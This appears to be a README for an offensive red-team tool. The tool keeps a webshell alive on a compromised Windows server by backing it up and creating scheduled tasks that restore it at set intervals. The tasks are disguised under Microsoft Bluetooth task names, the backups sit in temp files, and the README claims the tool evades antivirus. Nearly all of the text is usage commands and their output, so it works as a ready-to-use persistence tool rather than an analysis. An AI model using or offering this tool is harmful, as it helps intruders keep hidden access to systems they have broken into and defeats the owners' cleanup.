Some of the words
After Windows machine obtains target Webshell in red team task, progress maintains permissions through scheduled task, so as to avoid shell being deleted by defense
More personal tools you can go to my github:
Actual Use
Very easy you must be know how to use, you can like this to add a plan to backup your webshell:
Usage: + your tar exe + Which plan Such as:
15.exe C:\WWW\1.php A
A:1m exec、B:30m exec、C:3h exec
C:\Users\Administrator\Desktop\y>15x32.exe C:\phpstudyWWW\shell.php
Usage: + your tar exe + Which plan Such as:
15.exe C:\WWW\1.php A
A:1m exec、B:30m exec、C:3h exec
C:\Users\Administrator\Desktop\y>15x32.exe C:\phpstudyWWW\shell.php A
YourTaskname:ReinstallDeviceTask YourTaskPath:\Microsoft\Windows\Bluetooth
YourTask Success!!! YourTempDir:C:\Users\Public\Downloads\temp.txt
C:\Users\Administrator\Desktop\y>15x32.exe C:\phpstudyWWW\shell.php B
YourTaskname:ReinstallDeviceTasks YourTaskPath:\Microsoft\Windows\Bluetooth
YourTask Success!!! YourTempDir:C:\Windows\Temp\updatetemp.txt
C:\Users\Administrator\Desktop\y>15x32.exe C:\phpstudyWWW\shell.php C
YourTaskname:AutoReinstallDeviceTask YourTaskPath:\Microsoft\Windows\Bluetooth
YourTask Success!!! YourTempDir:C:\Windows\Temp\oldtemp.txt

Manually execute to confirm program availability&BypassAV